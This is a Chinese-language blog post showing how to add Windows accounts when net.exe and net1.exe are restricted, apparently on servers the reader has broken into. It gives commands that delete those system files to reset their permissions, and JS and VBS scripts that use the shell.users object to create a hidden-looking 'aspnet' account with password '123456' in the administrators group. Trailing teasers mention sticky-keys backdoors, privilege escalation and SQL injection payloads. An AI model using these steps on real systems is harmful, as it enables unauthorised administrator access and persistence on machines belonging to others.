利用指令碼和命令繞過系統許可權新增賬號

2022-09-16 17:12:14 字數 1098 閱讀 8212

有時候一些人對伺服器的新增使用者的net和net1許可權做了限制,讓很多菜鳥朋友們望而止步。其實個人感覺遇到這個問題都很容易解決的,在此我也共享出我的方法給大家。

cmd命令刪除net和net1檔案。一般刪除之後系統會自動恢復檔案,恢復的時候許可權是系統重新預設的。大家就可以引用下面這段命令

1:del c:\windows\system32\net.exe

2:del c:\windows\system32\net1.exe

你在cmd命令之後你會驚奇的發現可以使用cmd命令來新增系統帳戶了,如果提示系統未能找到該檔案的話就自己上傳乙個去,這個我也不用多說了,也就是自己系統下面的net檔案xp系統下的net檔案也是一樣的。一般此方法的成功率在百分之七十!

如果上面方法未能成功的話我們還可以使用另外乙個方

法,這個方法我也都是網上檢視到的。感覺這個方法很實用,所以也都貢獻給大家吧,就是利用使用者控制面板檔案nusrmgr.cpl,發現呼叫的是

shell.users來加使用者,它還同時呼叫了

shell.users就足夠了。那麼可能在刪掉了net.exe和不用adsi之外,這也是另外一種新增系統賬號的方法哦,**如下:

js指令碼:

var o=new activexobject( "shell.users" );

z=o.create("aspnet") ;

z.changepassword("123456","")

z.setting("accounttype")=3;

vbs指令碼:

set o=createobject( "shell.users" )

set z=o.create("aspnet")

z.changepassword "123456",""

z.setting("accounttype")=3

0:"guests"

1:"users"

2:"power users"

3:"administrators"

帳號:aspnet

密碼:123456

相信上面大家也看的懂吧,也就是利用vbs和js指令碼來新增系統帳戶。我也有測試過發現的確可行,上面gueste那些是需要新增進去的組,自己可以選擇!

08提權 系統檔案許可權和遠端連線IP繞過 安裝後門

大家都知道 08許可權的系統許可權設定很嚴格 面對限制 ip連線的情況 我們及時拿到 system 許可權有賬號也上不去 這種情況下只能弄 shift 後門或者放大鏡了但08 許可權在system 許可權也操作不了系統資料夾 普通許可權 我用的到時 ms12042 這個大家都會用單獨講 sysret...

SQL注入筆記05 利用和繞過

2 利用報錯資訊 1.extractvalue select from test where id 1 and extractvalue 1,concat 0x7e,select user 0x7e 2.updatexml select from test where id 1 and update...

指令碼命令 利用 tee 命令除錯shell指令碼

在編寫shell指令碼時,除錯是個比較麻煩的事,特別是涉及到多層管道命令的時候,會產生多個中間結果,tee命令的作用是從標準輸入中讀取資料寫入標準輸出或檔案中,利用它可以從管道中讀取中間結果並寫入本地臨時檔案中,通過中間結果可以一步一步的定位到指令碼的錯誤 例項 下面是乙個簡單的指令碼,指令碼中 p...